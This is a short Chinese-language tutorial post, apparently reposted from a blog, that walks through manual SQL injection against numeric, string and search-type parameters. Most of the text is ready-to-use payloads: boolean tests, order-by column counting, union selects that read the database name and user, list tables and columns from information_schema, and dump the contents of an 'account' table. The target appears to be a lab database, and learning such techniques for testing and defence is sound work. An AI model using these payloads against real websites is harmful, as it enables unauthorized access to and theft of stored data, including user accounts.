目錄
- SQL注入
- 數字型
- 1.測驗有無測驗點
- 2.order by 陳述句判斷欄位長,查出欄位為3
- 3.猜出欄位位(必須與內部欄位數一致)(用union聯合查詢查看回顯點為2,3)
- 4.猜資料庫名,用戶
- 5.聯合查詢(group_concat())點代表下一級,猜解當前資料庫pentest中所有的表名,
- 6.猜列名( account 表和 news 表)
- 7.查詢表中的資料
- 字符型
- 1.判斷是否存在注入
- 2.接下來利用order by判斷欄位長,帶入SQL查詢陳述句可直接查詢出資料(查詢陳述句和數字型一樣)
- 搜索型
- 1.搜索型需要多閉合一個%,其他都與前面類似
- 數字型
SQL注入
數字型
1.測驗有無測驗點
and 1=1,and 1=2
2.order by 陳述句判斷欄位長,查出欄位為3
-
order by 陳述句用于根據指定的列對結果集進行排序
-
order by后可以加列名,也可以加數字(代表第幾列)
id = 1 order by 3(數字) //回傳正常
id = 1 order by 4(數字) //回傳例外 //說明欄位長為3
3.猜出欄位位(必須與內部欄位數一致)(用union聯合查詢查看回顯點為2,3)
id= -1 union select 1,2,3
4.猜資料庫名,用戶
id =-1 union select 1,database(),user()
5.聯合查詢(group_concat())點代表下一級,猜解當前資料庫pentest中所有的表名,
id= -1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
6.猜列名( account 表和 news 表)
id= -1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='account'
id= -1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news'
7.查詢表中的資料
id= -1 union select 1,group_concat(id,'--',title,'--',content),3 from news limit 0,1
id= -1 union select 1,group_concat(Id,'--',rest,'--',own),3 from account limit 0,1
字符型
1.判斷是否存在注入
1' or '1'='1 //回傳正常
1' or '1'='2 //回傳例外
2.接下來利用order by判斷欄位長,帶入SQL查詢陳述句可直接查詢出資料(查詢陳述句和數字型一樣)
1' order by 3# //回傳正常
1' order by 4# //回傳例外
//注意#號用途:#起注釋作用,會注釋掉后面的' 單行注釋還可用-- (--后面需加一個空格)
//注意后面的SQL查詢陳述句末尾都得加一個#
搜索型
1.搜索型需要多閉合一個%,其他都與前面類似
-
首先判斷注入點
1%' or 1=1# 1%' or 1=2#下面就和前面數字型步驟一樣,帶入查詢陳述句即可
1%' union select 1,database(),user()# //比如這里查詢資料庫名和用戶
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/270674.html
標籤:其他
上一篇:滲透測驗之情報資訊收集